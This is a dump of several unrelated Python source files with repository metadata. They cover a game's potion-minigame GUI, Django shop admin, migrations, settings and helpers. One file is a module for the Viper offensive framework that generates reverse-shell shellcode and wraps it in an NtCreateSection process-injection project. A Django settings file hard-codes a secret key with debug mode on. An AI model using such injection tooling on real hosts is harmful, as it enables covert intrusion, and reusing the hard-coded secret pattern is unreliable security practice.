self.returnButton = GuiButton.GuiButton(text = (PLocalizer.PotionGui['SwitchRecipe'], PLocalizer.PotionGui['SwitchRecipe'], PLocalizer.PotionGui['SwitchRecipe'], PLocalizer.PotionGui['SwitchRecipe']), pos = (-0.58, 0.0, -0.62), text_scale = PiratesGuiGlobals.TextScaleExtraLarge, text_shadow = None, image = (None, None, None, None), text0_fg = PotionGlobals.TextColor, text1_fg = PiratesGuiGlobals.TextFG0, text2_fg = PiratesGuiGlobals.TextFG15, text3_fg = PotionGlobals.TextColorDisabled, parent = self.background, command = self.confirmReturn)
self.returnButton.stash()
self.hintsButton = GuiButton.GuiButton(text = (PLocalizer.PotionGui['ShowTutorial'], PLocalizer.PotionGui['ShowTutorial'], PLocalizer.PotionGui['ShowTutorial'], PLocalizer.PotionGui['ShowTutorial']), text_scale = PiratesGuiGlobals.TextScaleSmall, image_scale = (0.25, 0.1, 0.18), image_pos = (0, 0, 0), pos = (-0.53, 0.0, 0.075), parent = self.buttonsBackground, command = self.showLastHint)
self.InfoButton = GuiButton.GuiButton(text = (PLocalizer.PotionGui['IngredientList'], PLocalizer.PotionGui['IngredientList'], PLocalizer.PotionGui['IngredientList'], PLocalizer.PotionGui['IngredientList']), text_scale = PiratesGuiGlobals.TextScaleSmall, image_scale = (0.3, 0.1, 0.18), image_pos = (0, 0, 0), pos = (-0.84, 0.0, 0.075), parent = self.buttonsBackground, command = self.showInfo)
textureCard.remove_node()
base.loadingScreen.endStep('init Gui')
def updateRepMeter(self, catagory, value):
if catagory == InventoryType.PotionsRep:
self.repMeter.update(value)
def disableButtons(self):
pass
def enableButtons(self):
pass
def confirmQuit(self):
if self.gameFSM.getCurrentOrNextState() in [
'Intro',
'Exit']:
return None
if self.gameFSM.getCurrentOrNextState() not in [
'Anim']:
if self.closeCurrentDialog is not None:
self.closeCurrentDialog()
if self.gameFSM.gameStarted:
self.confirm = PiratesConfirm.PiratesConfirm(PLocalizer.PotionGui['ExitTitle'], PLocalizer.PotionGui['AbortAndExitText'], self.onCloseConfirmed)
self.confirm.bNo['command'] = self.onCloseDeclined
self.closeCurrentDialog = self.cleanUpConfirm
self.gameBoard.disableInputEvents()
self.disableButtons()
self.gameFSM.demand('ExitRequest')
else:
self.confirm = PiratesConfirm.PiratesConfirm(PLocalizer.PotionGui['ExitTitle'], PLocalizer.PotionGui['ExitText'], self.onCloseConfirmed)
self.confirm.bNo['command'] = self.onQuitDeclined
self.closeCurrentDialog = self.cleanUpConfirm
self.gameFSM.demand('ExitRequest')
self.confirm.setPos(0.35, 0, -0.17)
else:
self.askToExit = True
def confirmReturn(self):
if self.gameFSM.getCurrentOrNextState() in [
'Intro',
'Exit']:
return None
if self.gameFSM.getCurrentOrNextState() not in [
'Anim']:
if self.closeCurrentDialog is not None:
self.closeCurrentDialog()
self.closeCurrentDialog = self.cleanUpConfirm
self.confirm = PiratesConfirm.PiratesConfirm(PLocalizer.PotionGui['SwitchTitle'], PLocalizer.PotionGui['SwitchText'], self.onReturnConfirmed)
self.confirm.setPos(0.35, 0, -0.17)
self.confirm.bNo['command'] = self.onCloseDeclined
self.gameBoard.disableInputEvents()
self.disableButtons()
self.gameFSM.demand('SwitchRequest')
else:
self.askToReturn = True
def showLastHint(self):
if self.gameFSM.getCurrentOrNextState() in [
'Intro',
'Exit']:
return None
if self.gameFSM.getCurrentOrNextState() not in [
'Anim']:
self.hintScreen.toggle()
else:
self.askForHint = True
def showInfo(self):
if self.gameFSM.getCurrentOrNextState() in [
'Intro',
'Exit']:
return None
if self.gameFSM.getCurrentOrNextState() not in [
'Anim']:
self.gameFSM.demand('Tutorial')
self.infoScreen.toggle()
else:
self.askForInfo = True
def cleanUpConfirm(self):
self.closeCurrentDialog = None
self.enableButtons()
if self.confirm:
self.confirm.destroy()
self.confirm = None
def onQuitDeclined(self):
self.cleanUpConfirm()
self.gameFSM.request('RecipeSelect')
def onCloseDeclined(self):
self.cleanUpConfirm()
self.gameFSM.request('Eval')
def onCloseConfirmed(self):
self.enableButtons()
self.closeCurrentDialog = None
self.gameFSM.request('Exit')
def onReturnConfirmed(self):
self.enableButtons()
self.closeCurrentDialog = None
self.gameFSM.request('Reset')
def onIntroComplete(self):
if self.hintScreen.show('RecipeList'):
self.gameFSM.request('Tutorial')
else:
self.gameFSM.request('RecipeSelect')
def _initIntervals(self):
self.introSequence = Sequence(Wait(0.1), Func(self.recipePicker.unstash), LerpColorScaleInterval(self.fadeIn, colorScale = (1, 1, 1, 0), duration = 2.0), Func(self.onIntroComplete), name = 'PotionsGame.introSequence')
self.outroSequence = Sequence(Wait(0.1), LerpColorScaleInterval(self.fadeIn, colorScale = (1, 1, 1, 1), duration = 1.5), Func(base.transitions.fadeOut, 0), Func(self.destroy), name = 'PotionsGame.outroSequence')
self.completeSequence = Sequence(Wait(0.1), Func(self.resultsScreen.show), name = 'PotionsGame.completeSequence')
self.failSequence = Sequence(Wait(0.1), Func(self.failScreen.show), name = 'PotionsGame.failSequence')
self.restartSequence = Sequence(Func(self.resetScene), Wait(0.1), Func(self.resetRecipes), Func(self.recipePicker.updateList), Func(self.recipePicker.unstash), Func(self.onIntroComplete), name = 'PotionsGame.restartSequence')
def resetRecipes(self):
self.recipePicker.setEnabled(True)
for recipe in self.recipes:
recipe.reset()
def selectRecipe(self, recipe):
if self.gameFSM.state != 'RecipeSelect':
return None
itemId = PotionGlobals.potionBuffIdToInventoryTypeId(recipe.potionID)
inv = localAvatar.getInventory()
if not inv:
return None
quantity = inv.getItemQuantity(InventoryType.ItemTypeConsumable, itemId)
limit = inv.getItemLimit(InventoryType.ItemTypeConsumable, itemId)
if quantity >= limit:
self.cleanUpConfirm()
self.confirm = PiratesConfirm.PiratesConfirm(PLocalizer.PotionGui['MaxedOutTitle'], PLocalizer.PotionGui['MaxedOutText'], self.onSelectConfirmed)
self.confirm.setPos(0.35, 0, -0.17)
self.confirm.bOk['command'] = self.onSelectConfirmed
self.confirm.bOk['extraArgs'] = [
recipe]
self.confirm.bNo['command'] = self.onSelectDeclined
self.closeCurrentDialog = self.cleanUpConfirm
self.gameBoard.disableInputEvents()
self.disableButtons()
else:
self.gameFSM.request('StartGame', recipe)
def onSelectDeclined(self):
self.cleanUpConfirm()
def onSelectConfirmed(self, recipe):
self.cleanUpConfirm()
self.enableButtons()
self.closeCurrentDialog = None
if self.gameFSM:
self.gameFSM.request('StartGame', recipe)
def testRecipe(self):
for column in self.gameBoard.boardPieces:
for piece in column:
if piece is not None:
for ingredient in self.currentRecipe.ingredients:
if ingredient.completed == False and piece.colorIndex == ingredient.colorIndex and piece.level == ingredient.level:
return True
continue
return False
def showIngredientXP(self, ingredient):
if not self.currentRecipe.complete:
xpAmt = PotionGlobals.getPotionBuffXP(self.currentRecipe.potionID)
if len(self.currentRecipe.ingredients) > 1:
xpAmt = int(math.ceil(float(xpAmt) / 2.0 * float(len(self.currentRecipe.ingredients) - 1)))
xpLabel = DirectLabel(parent = aspect2d, relief = None, text = '+ ' + str(xpAmt) + ' ' + PLocalizer.PotionGui['XPLabel'], text_scale = PiratesGuiGlobals.TextScaleTitleMed, text_font = PiratesGlobals.getPirateOutlineFont(), text_align = TextNode.ALeft, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_wordwrap = 37, pos = (ingredient.getX(aspect2d) + 0.1, 0, ingredient.getZ(aspect2d) - 0.05), textMayChange = 0)
xpLabel.setTransparency(True)
xpLabel.stash()
return Sequence(Func(xpLabel.unstash), Parallel(LerpPosInterval(xpLabel, duration = 1.5, pos = (ingredient.getX(aspect2d) + 0.1, 0.0, ingredient.getZ(aspect2d) + 0.1), blendType = 'easeOut'), LerpColorScaleInterval(xpLabel, duration = 1.5, colorScale = (1, 1, 1, 0), blendType = 'easeIn')), Func(xpLabel.remove_node))
else:
return Wait(0.1)
def checkRecipe(self):
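        # Match remaining board pieces against uncompleted recipe ingredients,
        # mark the matches complete, and queue their movement/removal animations.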
self.ingredientsCompleted = 0
if len(self.currentRecipe.ingredients) != 0:
for column in self.gameBoard.boardPieces:
for piece in column:
if piece is not None:
pieceUsed = False
for ingredient in self.currentRecipe.ingredients:
if ingredient.completed == False and piece.colorIndex == ingredient.colorIndex and piece.level == ingredient.level and not pieceUsed:
ingredient.completed = True
self.ingredientsCompleted += 1
self.gameBoard.boardPieces[int(piece.column)][int(piece.row)] = None
pieceUsed = True
self.currentRecipe.complete = True
for testingredient in self.currentRecipe.ingredients:
if testingredient.completed == False:
self.currentRecipe.complete = False
continue
piece.wrtReparentTo(self.currentRecipe)
piece.setY(-5)
print 'adding animation for completed ingredient'
self.animationList.append(Sequence(piece.moveToBoardVerySlow(ingredient.column, ingredient.row), Func(ingredient.updateDisplay), Func(piece.remove_node), Func(self.gameBoard.kill, piece)))
self.postAnimationList.append(self.showIngredientXP(ingredient))
continue
def destroy(self):
self.ignoreAll()
self.gameFSM.ignoreAll()
self.ignore('seachestOpened')
self.ignore('seachestClosed')
if self.introSequence:
self.introSequence.pause()
self.introSequence = None
if self.outroSequence:
self.outroSequence.pause()
self.outroSequence = None
if self.completeSequence:
self.completeSequence.pause()
self.completeSequence = None
if self.restartSequence:
self.restartSequence.pause()
self.restartSequence = None
self.cleanUpConfirm()
self.closeButton.destroy()
del self.closeButton
self.returnButton.destroy()
del self.returnButton
self.background.remove_node()
del self.background
self.buttonsBackground.remove_node()
del self.buttonsBackground
self.fadeIn.remove_node()
del self.fadeIn
self.xpBackground.remove_node()
del self.xpBackground
self.foregroundLayer.remove_node()
del self.foregroundLayer
self.foregroundTextureCard.remove_node()
del self.foregroundTextureCard
self.recipePicker.destroy()
del self.recipePicker
self.resultsScreen.destroy()
self.resultsScreen = None
self.failScreen.destroy()
del self.failScreen
self.infoScreen.destroy()
del self.infoScreen
self.hintScreen.destroy()
del self.hintScreen
self.gameBoard.destroy()
del self.gameBoard
base.musicMgr.stop(SoundGlobals.MUSIC_MINIGAME_POTION)
self.dist.done()
self.gameFSM.destroy()
del self.gameFSM
self.gameFSM = None
for recipe in self.recipes:
recipe.reset()
recipe.destroy()
del self.recipes
def updateResultsScreen(self):
if self.resultsScreen:
self.resultsScreen.show()
| [
"[email protected]"
] | |
a39ac72e3dd8293bb7c5a117983a0650437216be | 8e52e07428cb9ded3e96db45e9d9e4444ba80224 | /vegetableOrder/migrations/0007_auto_20170422_1146.py | dff84affaada50f0eb21a18d502b84f3ebcf05f5 | [] | no_license | prashantspandey/mohanamandi | c2f8a1763813f7df21db7579bcb44b9f390d870f | 99231feaa9eb442d20a65a6754ec5b1df4e5208c | refs/heads/master | 2021-01-20T05:15:31.741033 | 2017-04-29T05:44:32 | 2017-04-29T05:44:32 | 89,766,250 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 747 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-04-22 06:16
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('vegetables', '0005_vegetable_subpricekg'),
('vegetableOrder', '0006_auto_20170422_1142'),
]
operations = [
migrations.RemoveField(
model_name='vegetable_order',
name='ordercart',
),
migrations.AddField(
model_name='vegetable_order',
name='orderveg',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='vegetables.Vegetable'),
),
]
| [
"[email protected]"
] | |
b996c977517f5ce622b698b1872d39647e064362 | 06a863150a7a3a7bfc0c341b9c3f267727606464 | /lib/gii/qt/controls/Settings.py | 417bb2b0cbf6570f8ede7d3aaa6f6f5318978c4f | [
"MIT"
] | permissive | brucelevis/gii | c843dc738a958b4a2ffe42178cff0dd04da44071 | 03624a57cf74a07e38bfdc7f53c50bd926b7b5a7 | refs/heads/master | 2020-10-02T00:41:02.723597 | 2016-04-08T07:44:45 | 2016-04-08T07:44:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | from PyQt4 import QtCore
globalSettings=QtCore.QSettings('Hatrix','GII')
def setGlobalSettingFile(filepath):
global globalSettings
globalSettings=QtCore.QSettings(filepath, QtCore.QSettings.IniFormat)
def getGlobalSettings():
return globalSettings
def setSettingValue(name, value):
globalSettings.setValue(name, value)
def getSettingValue(name):
	return globalSettings.value(name)
setGlobalSettingFile('gii.ini') | [
"[email protected]"
] | |
ddcb78be7a534d96575e83381e99bcf1d76d713c | a2706c66c4f2769c00fc5f67e1a85742cfa7e17c | /MODULES/Execution_UserExecution_NtCreateSection.py | f244911cfec971ee6844a6865d5e9bd77056d65a | [
"BSD-3-Clause"
] | permissive | Jeromeyoung/viperpython | 48800312dcbdde17462d28d45865fbe71febfb11 | ba794ee74079285be32191e898daa3e56305c8be | refs/heads/main | 2023-09-01T18:59:23.464817 | 2021-09-26T04:05:36 | 2021-09-26T04:05:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,122 | py | # -*- coding: utf-8 -*-
# @File : SimpleRewMsfModule.py
# @Date : 2019/1/11
# @Desc :
import time
from Lib.ModuleAPI import *
class PostModule(PostPythonModule):
NAME_ZH = "NtCreateSection进程注入"
DESC_ZH = "使用NtCreateSection及NtMapViewOfSection远程线程注入技术打开共享内存,将shellcode注入到其他进程中"
NAME_EN = "NtCreateSection process injection"
DESC_EN = "Use NtCreateSection and NtMapViewOfSection remote thread injection technology to open shared memory and inject shellcode into other processes"
MODULETYPE = TAG2TYPE.Execution
    PLATFORM = ["Windows"]  # platform
    PERMISSIONS = ["User", "Administrator", "SYSTEM"]  # required privileges
    ATTCK = []  # ATT&CK vectors
README = ["https://www.yuque.com/vipersec/module/hncv58"]
REFERENCES = ["https://idiotc4t.com/code-and-dll-process-injection/untitled"]
AUTHOR = "Viper"
OPTIONS = register_options([
OptionHander(),
])
def __init__(self, sessionid, ipaddress, custom_param):
super().__init__(sessionid, ipaddress, custom_param)
    def check(self):
        """Pre-execution check run before the module executes."""
payload = self.get_handler_payload()
if "windows" not in payload:
return False, "选择handler错误,请选择windows平台的监听", "Select the handler error, please select the handler of the windows platform"
return True, None
def run(self):
shellcode = self.generate_hex_reverse_shellcode_by_handler()
FUNCTION = self.random_str(8)
FUNCTION1 = self.random_str(9)
source_code = self.generate_context_by_template(filename="main.cpp", SHELLCODE_STR=shellcode, FUNCTION=FUNCTION,
FUNCTION1=FUNCTION1)
filename = f"NtCreateSection_{int(time.time())}.zip"
self.write_zip_vs_project(filename, source_code, )
self.log_info("模块执行完成", "Module operation completed")
self.log_good(f"请在<文件列表>中查看生成的源码: {filename}", f"Please check the generated source code in <Files>: {filename}")
| [
"[email protected]"
] | |
22ff3c8ec043a748f85e7e330611f00ac0949c95 | e86d020f8ade86b86df6ad8590b4458a9d415491 | /projects/test-crrr/base_mission/utils/check_logger.py | c944ef41446f4be841f1c6a115e7d739a4cbadc0 | [] | no_license | g842995907/guops-know | e4c3b2d47e345db80c27d3ba821a13e6bf7191c3 | 0df4609f3986c8c9ec68188d6304d033e24b24c2 | refs/heads/master | 2022-12-05T11:39:48.172661 | 2019-09-05T12:35:32 | 2019-09-05T12:35:32 | 202,976,887 | 1 | 4 | null | 2022-11-22T02:57:53 | 2019-08-18T08:10:05 | JavaScript | UTF-8 | Python | false | false | 1,610 | py | # -*- coding: utf-8 -*-
import hashlib
import logging
import os
import sys
from cr_scene.utils.uitls import get_cr_scene_name
from cr import settings
def scene_log_key(scene_name, name):
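    # Note: only scene_name feeds the cache key below; the name argument is
    # accepted by the call sites but is not hashed into the key.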
_key = hashlib.md5('{}-scene'.format(scene_name)).hexdigest()
return _key
class SceneLogFactory(object):
logger_pool = {}
def __new__(cls, scene_id, name):
scene_name = get_cr_scene_name(scene_id)
_key = scene_log_key(scene_name, name)
if _key in cls.logger_pool:
_logger = cls.logger_pool[_key]
else:
_logger = cls._generate(_key, scene_name)
cls.logger_pool[_key] = _logger
return _logger
@classmethod
def _generate(cls, key, scene_name):
logger = logging.getLogger(key)
        # Configure the logger output format
# formatter = logging.Formatter('%(levelname)s %(asctime)s %(module)s - %(message)s')
formatter = logging.Formatter('%(levelname)s %(asctime)s - %(message)s')
        # File log handler
file_handler = logging.FileHandler(os.path.join(settings.BASE_DIR, 'log/scene-{}.log'.format(scene_name)))
        file_handler.setFormatter(formatter) # the output format can be set via setFormatter
        # Console log handler
console_handler = logging.StreamHandler(sys.stdout)
        console_handler.formatter = formatter # the formatter attribute can also be assigned directly
        # Attach both handlers to the logger
logger.addHandler(file_handler)
logger.addHandler(console_handler)
logger.setLevel(logging.INFO)
logger.propagate = 0
return logger
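# A minimal usage sketch of the factory above (the scene id and tag here are
# hypothetical values). The factory hands back one cached logger per scene,
# writing to log/scene-<scene name>.log and echoing to stdout:
#
#   logger = SceneLogFactory(scene_id, 'base-mission')
#   logger.info('mission check started')
#   # a second call for the same scene returns the same logger instance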
| [
"[email protected]"
] | |
de84dd671bfd25d67ce441fe83f372dad36cf79d | d62863d049c0206bfa744ca4c9e886030bfce1ab | /apps/sw_shop/sw_order/admin.py | 8f33c1274fda9fbe76529288d4886588f0b35c83 | [] | no_license | jurgeon018/box | 51738b99e640202936ed72357d3c67d2517e589b | 50b84a0afa73fab85a00eef54194f3c126d15397 | refs/heads/master | 2021-07-17T13:37:08.665292 | 2020-10-15T09:50:33 | 2020-10-15T09:50:33 | 232,013,297 | 0 | 1 | null | 2020-03-27T02:16:44 | 2020-01-06T03:01:34 | Python | UTF-8 | Python | false | false | 9,541 | py | from django.utils.translation import gettext_lazy as _
from django.contrib import admin
from django.shortcuts import reverse, render, redirect
from django.utils.html import mark_safe
from django.conf import settings
from box.apps.sw_shop.sw_order.models import Order, OrderStatus, Payment
# from box.apps.sw_payment.liqpay.admin import PaymentInline
from box.apps.sw_shop.sw_cart.admin import CartItemInline
from box.core.utils import show_admin_link
from box.core.sw_solo.admin import SingletonModelAdmin
from .models import *
from .filters import *
from .forms import *
from modeltranslation.admin import TabbedTranslationAdmin, TranslationStackedInline, TranslationTabularInline
if 'jet' in settings.INSTALLED_APPS:
from jet.filters import DateRangeFilter, DateTimeRangeFilter
else:
from rangefilter.filter import DateRangeFilter, DateTimeRangeFilter
import nested_admin
from import_export.admin import ImportExportModelAdmin
from .resources import *
class OrderInline(admin.TabularInline):
def show_link(self, obj):
return mark_safe(f'<a href="/admin/sw_order/order/{obj.id}/change">Замовлення № {obj.id}</a>')
show_link.short_description = _("Ссилка")
model = Order
extra = 0
fields = [
'show_link',
'name',
'email',
'phone',
'address',
'total_price',
'paid',
'ordered',
'created',
]
readonly_fields = [
'show_link'
]
def has_change_permission(self, request, obj):
return False
def has_delete_permission(self, request, obj):
return False
def has_add_permission(self, request, obj):
return False
@admin.register(OrderStatus)
class OrderStatusAdmin(
TabbedTranslationAdmin,
ImportExportModelAdmin,
):
def get_model_perms(self, request):
return {}
resource_class = OrderStatusResource
search_fields = [
'name'
]
@admin.register(Payment)
class PaymentAdmin(admin.ModelAdmin):
pass
class PaymentInline(nested_admin.NestedTabularInline):
def has_add_permission(self, request, obj=None):
return False
def has_change_permission(self, request, obj=None):
return False
def has_delete_permission(self, request, obj=None):
return False
model = Payment
extra = 0
exclude = []
@admin.register(Order)
class OrderAdmin(nested_admin.NestedModelAdmin):
def total_with_coupon(self, obj=None):
return f'{obj.total_price_with_coupon} {obj.currency}'
def total_without_coupon(self, obj=None):
return f'{obj.total_price} {obj.currency}'
# return f'{obj.total_price_with_coupon} {obj.currency}'
def show_user(self, obj):
link = show_admin_link(obj, obj_attr='user', obj_name='username', option='change')
return link
def show_id(self, obj):
return mark_safe(f'<a href="/admin/sw_order/order/{obj.id}/change" >Замовлення № {obj.id}</a>')
def items_count(self, obj):
return obj.cart_items.all().count()
def delete(self, obj):
return mark_safe(f'<a href="/admin/sw_order/order/{obj.id}/delete" style="color:red" >x</a>')
    # TODO: refactor these intermediate admin actions into a shared helper function
def change_status(self, request, queryset):
form = None
if 'apply' in request.POST:
form = ChangeStatusForm(request.POST)
if form.is_valid():
status = form.cleaned_data['status']
count = 0
for item in queryset:
item.status = status
item.save()
count += 1
self.message_user(request, f'Статус {status} був застосований для {count} товарів')
return redirect(request.get_full_path())
if not form:
form = ChangeStatusForm(initial={"_selected_action":request.POST.getlist(admin.ACTION_CHECKBOX_NAME)})
return render(request, 'order/admin/change_status.html', {'items':queryset, 'form':form, 'title':'Зміна статусу'})
def put_tags_on(self, request, queryset):
form = None
print(request.POST)
if 'apply' in request.POST:
form = ChangeTagsForm(request.POST)
if form.is_valid():
tags = form.cleaned_data['tags']
count = 0
for item in queryset:
for tag in tags:
item.tags.add(tag)
item.save()
count+=1
self.message_user(request, f'Теги {tags} були додані до {count} товарів')
return redirect(request.get_full_path())
if not form:
form = ChangeTagsForm(initial={'_selected_action':request.POST.getlist(admin.ACTION_CHECKBOX_NAME)})
return render(request, 'order/admin/change_tags.html', {
'items':queryset, 'form':form, 'title':'Зміна тегів',
'value':'put_tags_on',
'text':'Новый тег будет назначен для следующих позиций'
})
def put_tags_off(self, request, queryset):
form = None
print(request.POST)
if 'apply' in request.POST:
form = ChangeTagsForm(request.POST)
if form.is_valid():
tags = form.cleaned_data['tags']
count = 0
for item in queryset:
for tag in tags:
item.tags.remove(tag)
item.save()
count+=1
self.message_user(request, f'Теги {tags} були забрані з {count} товарів')
return redirect(request.get_full_path())
if not form:
form = ChangeTagsForm(initial={'_selected_action':request.POST.getlist(admin.ACTION_CHECKBOX_NAME)})
return render(request, 'order/admin/change_tags.html', {
'items':queryset, 'form':form, 'title':'Зміна тегів',
'value':'put_tags_off',
'text':'Теги будуть забрані з наступних позицій'
})
def show_tags(self, obj):
result = ''
for tag in obj.tags.all():
result += (f'<span style="background-color:{tag.color}">{tag.name}</span><br>')
if not result:
return '---'
return mark_safe(result)
show_tags.short_description = ("Теги")
actions = [
change_status,
put_tags_on,
put_tags_off,
]
date_hierarchy = 'created'
show_user.short_description = _('Користувач')
show_id.short_description = _('ID замовлення')
items_count.short_description = _('Товари')
total_with_coupon.short_description = _('Сумма замовлення без скидки')
total_without_coupon.short_description = _('Сумма замовлення зі скидкою')
inlines = [
CartItemInline,
PaymentInline,
]
list_display = [
'show_id',
'name',
'status',
'show_tags',
'items_count',
'total_price',
'created',
'delete',
]
list_display_links = [
'show_id',
'name',
'items_count',
'total_price',
'created',
]
list_editable = [
'status'
]
search_fields = [
'user__username',
'name',
'email',
'phone',
'address',
'note',
]
list_filter = [
'status',
'tags',
# ('created', DateTimeRangeFilter),
('created', DateRangeFilter),
# ('updated', DateTimeRangeFilter),
('updated', DateRangeFilter),
]
fields = [
# 'user',
'show_user',
'status',
'tags',
'name',
'email',
'phone',
'address',
'comments',
'coupon',
'payment_opt',
'delivery_opt',
'ordered',
'paid',
"total_with_coupon",
"total_without_coupon",
'note',
]
if 'jet' not in settings.INSTALLED_APPS:
autocomplete_fields = [
'status',
'tags',
'coupon',
]
readonly_fields = [
'show_user',
'total_with_coupon',
'total_without_coupon',
]
list_per_page = 100
@admin.register(ItemRequest)
class ItemRequestAdmin(admin.ModelAdmin):
def show_item(self, obj=None):
from django.shortcuts import reverse
from django.utils.html import mark_safe
option = "change" # "delete | history | change"
massiv = []
obj = obj.item
app = obj._meta.app_label
model = obj._meta.model_name
url = f'admin:{app}_{model}_{option}'
href = reverse(url, args=(obj.pk,))
name = f'{obj.title}'
link = mark_safe(f"<a href={href}>{name}</a>")
return link
show_item.short_description = _('Товар')
readonly_fields = [
'show_item',
'name',
'email',
'phone',
'message',
]
fields = [
'show_item',
'name',
'email',
'phone',
'message',
]
class OrderStatusInline(TranslationTabularInline):
extra = 0
model = OrderStatus
class OrderRecipientEmailInline(admin.TabularInline):
model = OrderRecipientEmail
exclude = []
extra = 0
class OrderAdditionalPriceInline(admin.TabularInline):
model = OrderAdditionalPrice
exclude = []
extra = 0
@admin.register(OrderConfig)
class OrderConfigAdmin(SingletonModelAdmin):
inlines = [
OrderStatusInline,
OrderRecipientEmailInline,
OrderAdditionalPriceInline,
]
| [
"[email protected]"
] | |
e5766dadf98150deffa339dbefa2d888f7af7282 | 44869749f8af2b548a2fbb23403e1a623e29d691 | /mysite/mysite/settings.py | 208621a7982a95d9f9f745f6e2c27df05323735f | [] | no_license | Ojou/my-first-blog | 4536c4db194d325508fd000ccd5919a722772994 | e29be78c3c87b39c474dabf2a27387797c2d2a41 | refs/heads/master | 2016-08-12T15:27:52.761420 | 2016-03-12T05:06:06 | 2016-03-12T05:06:06 | 53,712,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,164 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.9.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ze-3#6+ge)9r78ditv6bquz(&+2wkfs9a8o_zm$$_03r=c+c6m'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
| [
"[email protected]"
] | |
8ea309b27efb5e75178ac071e23b510c86ee4065 | 270611d0cfe130fa3c1aa84665e0748c1ddb6ab8 | /instamojo/__init__.py | 7640c9159f96d87251ad5444549796488e5c03cd | [
"BSD-2-Clause"
] | permissive | iambibhas/instamojo-py | 1096a8b81fb3a6b9839cb10c4dd5dc246f2752c7 | 1e80bde09d63cee56f403e4b635e0a62c014af81 | refs/heads/master | 2021-01-14T12:21:19.714552 | 2014-11-08T17:23:42 | 2014-11-08T17:23:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27 | py | from .api import Instamojo
| [
"[email protected]"
] | |
2d2a84da60052c7bbdf576522c35aae0207f76a4 | 75136cd1865bd72ebad8ba31446d57d9fdedce22 | /pepysdiary/common/templatetags/search_tags.py | b9f9268357944463a88b44a9e284a80ec47c36ea | [] | no_license | hugovk/pepysdiary | ca9a1d39ed62e7299509daa69b5df0d5164aec31 | 1a67c11efb62f5392914732ad15a4db71872ed05 | refs/heads/main | 2021-12-03T01:36:16.626676 | 2021-11-08T17:29:51 | 2021-11-08T17:29:51 | 60,296,270 | 0 | 0 | null | 2016-06-02T20:48:07 | 2016-06-02T20:48:05 | null | UTF-8 | Python | false | false | 1,582 | py | from django import template
from django.utils.html import format_html
from django.utils.safestring import mark_safe
from pepysdiary.common.utilities import hilite_words, trim_hilites
register = template.Library()
@register.simple_tag()
def search_summary(obj, search_string):
"""
Returns the HTML to display search results summary text for an object.
It's a series of bits of the object's text fields that contain the
searched-for string, with the search term highlighted.
obj - One of Annotation, Article, Entry, Letter, Post, Topic
search_string - The string that was searched for.
"""
obj_name = obj.__class__.__name__
contents = []
if obj_name == "Entry":
contents = [obj.text, obj.footnotes]
elif obj_name == "Topic":
contents = [obj.title, obj.summary_html, obj.wheatley_html, obj.wikipedia_html]
elif obj_name == "Annotation":
contents = [obj.comment]
elif obj_name == "Letter":
contents = [obj.title, obj.text, obj.footnotes]
else:
# Article, Post
contents = [obj.title, obj.intro_html, obj.text_html]
content = " ".join(contents)
content = hilite_words(content, search_string)
hilites = trim_hilites(content, allow_empty=False, max_hilites_to_show=10)
if hilites["hilites_shown"] < hilites["total_hilites"]:
difference = hilites["total_hilites"] - hilites["hilites_shown"]
extra = f" <em>and {difference} more.</em>"
else:
extra = ""
return format_html("{}{}", mark_safe(hilites["html"]), mark_safe(extra))
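# A sketch of the intended template usage (the context variable names are
# hypothetical):
#
#   {% load search_tags %}
#   {% search_summary result_object search_string %}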
| [
"[email protected]"
] | |
